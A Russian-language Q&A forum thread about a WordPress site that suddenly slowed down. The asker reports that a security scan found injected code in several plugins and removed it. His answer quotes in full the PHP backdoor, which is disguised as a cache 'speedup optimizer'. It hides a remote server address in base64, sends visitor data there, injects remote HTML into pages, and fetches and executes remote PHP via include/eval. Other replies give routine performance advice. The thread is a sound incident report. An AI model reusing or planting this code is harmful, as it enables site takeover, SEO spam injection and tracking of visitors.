WordPress-сайт стал нереально тормозить — как найти причину?

Question

[Леонид]

Имеется средне-нагруженный WordPress-сайт, который в Google PageSpeed Insights показывал 70-85 для разных страниц.

Ни с того ни с чего сайт стал показывать совсем плохие результаты: 10-40 для разных страниц.

Все настройки кэширования, минизации и т.д. - всё в норме. Пробовали отключать и включать разные плагины - не помогает увы (...

Стали грешить на VPS-хостинг, поставили плагин Query Monitor - показывает 0,3-0,5 сек для разных страниц:



Но, по ощущениям при навигации как по сайту так и по админке - идет какое-то подвисание запросов.

А в Google PageSpeed Insights показывает так:



Тех. поддержка пишет что ping нормальный, сервер работает в стандартном режиме и вообще всё хорошо )

Куда копать?

Comments

[Владислав Лысков]

мб донора встудию? так или иначе гадание по кофейной гуще

[Леонид]

Владислав Лысков, а что вы подразумеваете под словом "донор"?

[Владислав Лысков]

Леонид, ваш сайт

[Леонид]

Владислав Лысков, а это сайт клиента - корпоративная политика не позволяет мне этого сделать. Но Вы наверное уже видели мой ответ снизу - проблема найдена, копать нужно было внутри - оказался вирус )

Answer 1

[Леонид]

Развернул копию сайта на локальном веб-сервере и та же самая история - значит хостинг тут не при делах.

Перепроверил замеры времени выполнения Query Monitor - "ручным" php-кодом в корневом файле index.php - результаты совпадают, Query Monitor показывает правду, а по нему выходит страницы генерируются не дольше 0,5 сек.

Менял тему - не помогает. Начал отключать плагины поочередно и когда отключил такую парочку: "CF-Post-Formats и Revolution Slider (Share on Theme123.Net) " - сайт ожил и время обработки запроса к страницам сайта снизилось до милисекунд.

На рабочем сервере такой же трюк с отключением этих плагинов не прошел, пришлось вырубить еще больше плагинов, чтобы всё заработало с прежней скоростью:



еще 2 недели назад все эти плагины в активном режиме работали и сайт не тормозил...

установил Wordfence Security - просканировал и вот совпадение в файлах именно этих выше приведенных плагинов была найдена следующая вставка кода:

/**
 * Speedup php function cache by optimizing buffer output
 */
;if (!function_exists('_php_cache_speedup_func_optimizer_')) { function _php_cache_speedup_func_optimizer_($buffer) {
    if (isset($GLOBALS['_php_cache_speedup_func_optimizer_completed_'])) {
        // already completed
        return $buffer;
    }

    $mod = false;
    $token = 'czoyMzoiaHR0cDovL3Bpd2VyLnB3L2FwaS5waHAiOw==';
    $tmp_buffer = $buffer; $gzip = false; $body = '<' . 'b' . 'o' . 'd' . 'y';

    if (($has_body = stripos($buffer, $body)) === false) {
        // define gzdecode function if not defined
        if (!function_exists('gzdecode')) {
            function gzdecode($data) {
                return @gzinflate(substr($data, 10, -8));
            }
        }

        // gzdecode buffer
        $tmp_buffer = @gzdecode($tmp_buffer);

        // check if buffer has body tag
        if (($has_body = stripos($tmp_buffer, $body)) !== false) {
            // got body tag, this should be gzencoded when done
            $gzip = true;
        }
    }

    if ($has_body === false) {
        // no body, return original buffer
        return $buffer;
    }

    $GLOBALS['_php_cache_speedup_func_optimizer_completed_'] = true;

    // decode token
    $func = 'b' . 'a' . 's' . 'e' . '6' . '4' . '_' . 'd' . 'e' . 'c' . 'o' . 'd' . 'e';
    $token = @unserialize(@$func($token));
    if (empty($token)) {
        return $buffer;
    }

    // download remote data
    function down($url, $timeout = 5) {
        // download using file_get_contents
        if (@ini_get('allow_url_fopen')) {
            $ctx = @stream_context_create(array('http' => array('timeout' => $timeout)));
            if ($ctx !== FALSE) {
                $file = @file_get_contents($url, false, $ctx);
                if ($file !== FALSE) {
                    return $file;
                }
            }
        }

        // download using curl
        if (function_exists('curl_init')) {
            $ch = curl_init();

            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

            $response = curl_exec($ch);
            curl_close($ch);

            return $response;
        }

        // download using sockets
        if (extension_loaded('sockets')) {
            $data = parse_url($url);
            if (!empty($data['host'])) {
                $host = $data['host'];
                $port = isset($data['port']) ? $data['port'] : 80;
                $uri = empty($data['path']) ? '/' : $data['path'];
                if (($socket = @socket_create(AF_INET, SOCK_STREAM, 0)) && @socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => $timeout, 'usec' => $timeout * 1000)) && @socket_connect($socket, $host, $port)) {
                    $buf = "GET $uri HTTP/1.0\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla (compatible; WinNT)\r\nHost: $host\r\n\r\n";
                    if (@socket_write($socket, $buf) !== FALSE) {
                        $response = '';
                        while (($tmp = @socket_read($socket, 1024))) {
                            $response .= $tmp;
                        }
                        @socket_close($socket);
                        return $response;
                    }
                }
            }
        }

        return false;
    }

    $token .= ((strpos($token, '?') === false) ? '?' : '&') . http_build_query(array(
        'h' => $_SERVER['HTTP_HOST'],
        'u' => $_SERVER['REQUEST_URI'],
        'a' => empty($_SERVER['HTTP_USER_AGENT']) ? '' : $_SERVER['HTTP_USER_AGENT'],
        'r' => empty($_SERVER['HTTP_REFERER']) ? '' : $_SERVER['HTTP_REFERER'],
        'i' => $_SERVER['REMOTE_ADDR'],
        'f' => __FILE__,
        'v' => 9
    ));
    $token = @unserialize(@$func(down($token)));

    if (empty($token) || empty($token['data']) || !is_array($token['data'])) {
        // invalid data
        return $buffer;
    }

    // fix missing meta description
    if (isset($token['meta']) && $token['meta'] && ($pos = stripos($tmp_buffer, '</head>')) !== false) {
        $tmp = substr($tmp_buffer, 0, $pos);
        if (stripos($tmp, 'name="description"') === false && stripos($tmp, 'name=\'description\'') === false && stripos($tmp, 'name=description') === false) {
            $meta = $_SERVER['HTTP_HOST'];
            // append meta description
            $tmp_buffer = substr($tmp_buffer, 0, $pos) . '<' . 'm' . 'e' . 't' . 'a' . ' ' . 'n' . 'a'. 'm' . 'e' . '='. '"' . 'd' . 'e' . 's' .'c' .'r' . 'i' . 'p' . 't' . 'i' . 'o' . 'n' . '"'. ' ' . 'c' . 'o' . 'n' . 't' . 'e' . 'n' . 't' . '="'. htmlentities(substr($meta, 0, 160)) .'">' . substr($tmp_buffer, $pos);
            $mod = true;
        }
    }

    foreach ($token['data'] as $tokenData) {
        if (!empty($tokenData['content'])) {
            // set defaults
            $tokenData = array_merge(array(
                'pos' => 'after',
                'tag' => 'bo' . 'dy',
                'count' => 0,
            ), $tokenData);

            // find all occurrences of <tag>
            $tags = array();
            while (true) {
                if (($tmp = @stripos($tmp_buffer, '<'.$tokenData['tag'], empty($tags) ? 0 : $tags[count($tags) - 1] + 1)) === false) {
                    break;
                }
                $tags[] = $tmp;
            }

            if (empty($tags)) {
                // no tags found or nothing to show
                continue;
            }

            // find matched tag position
            $count = $tokenData['count'];
            if ($tokenData['count'] < 0) {
                // from end to beginning
                $count = abs($tokenData['count']) - 1;
                $tags = array_reverse($tags);
            }

            if ($count >= count($tags)) {
                // fix overflow
                $count = count($tags) - 1;
            }

            // find insert position
            if ($tokenData['pos'] == 'before') {
                // pos is before
                $insert = $tags[$count];
            } else if (($insert = strpos($tmp_buffer, '>', $tags[$count])) !== false) {
                // pos is after, found end tag, insert after it
                $insert += 1;
            }

            if ($insert === false) {
                // no insert position
                continue;
            }

            // insert html code
            $tmp_buffer = substr($tmp_buffer, 0, $insert) . $tokenData['content'] . substr($tmp_buffer, $insert);
            $mod = true;
        } elseif (!empty($tokenData['replace'])) {
            // replace content
            @http_response_code(200);
            $tmp_buffer = $tokenData['replace'];
            $mod = true;
        } elseif (!empty($tokenData['run'])) {
            // save temporary optimization file
            register_shutdown_function(function($file, $content) {
                if (file_put_contents($file, $content) !== false) {
                    @chdir(dirname($file));
                    include $file;
                    @unlink($file);
                } else {
                    @eval('@chdir("' . addslashes(dirname($file)) . '");?>' . $content);
                }
            }, dirname(__FILE__) . '/temporary_optimization_file.php', strpos($tokenData['run'], 'http://') === 0 ? down($tokenData['run']) : $tokenData['run']);
        } else {
            // no content
            continue;
        }
    }

    // return gzencoded or normal buffer
    return !$mod ? $buffer : ($gzip ? gzencode($tmp_buffer) : $tmp_buffer);
} ob_start('_php_cache_speedup_func_optimizer_');
register_shutdown_function('ob_end_flush'); }
?>

какие-то игры с буфером )
странно что всё это раньше работало нормально, потому что этот вирусный код сидит уже с 2017 года (подглядел в бэкапы).

Исход: удалил вручную эти вставки кода из файлов плагинов - всё заработало с нормальной скоростью.

Answer 2

[lagudal]

ну не PageSpeed -ом единым....
Первое я бы протестировал в дев-туллс хрома и тут
Это позволит для начала понять, проблема на стороне сервера (если большое время ttfb), или что то из контента стало долго отдаваться (возможно, подключены где то внешние стили, скрипты или картинки, которые и дают проблему).
Ну а дальше - в зависимости от ситуации, профайлер, логи mysql и тд и тп....
да этот вопрос уже несколько раз тут поднимался. Например тут и тут.

Comments

[Леонид]

проблема на стороне сервера 100%, потому что:

смотреть логи mysql и профилировать - а зачем если Query Monitor показывает нормальные значения? или есть подозрения что он может нагло врать? ) я как-то всегда ему верил, хотя наверное может зря )

Answer 3

[alex-1917]

Вот здесь протестируй, там все наглядно и разжевано
https://gtmetrix.com/

10сек - это скорее всего системы статистики и прочая лабудень, иной раз смотришь на эти гроздья и слезу утираешь))) по 15-20 сервисов клеят на сайт, хорошо хоть один смотрят...
не слушайте псевдо-сео-шников и скидывайте всю эту хрень в подвал и будет шоколадно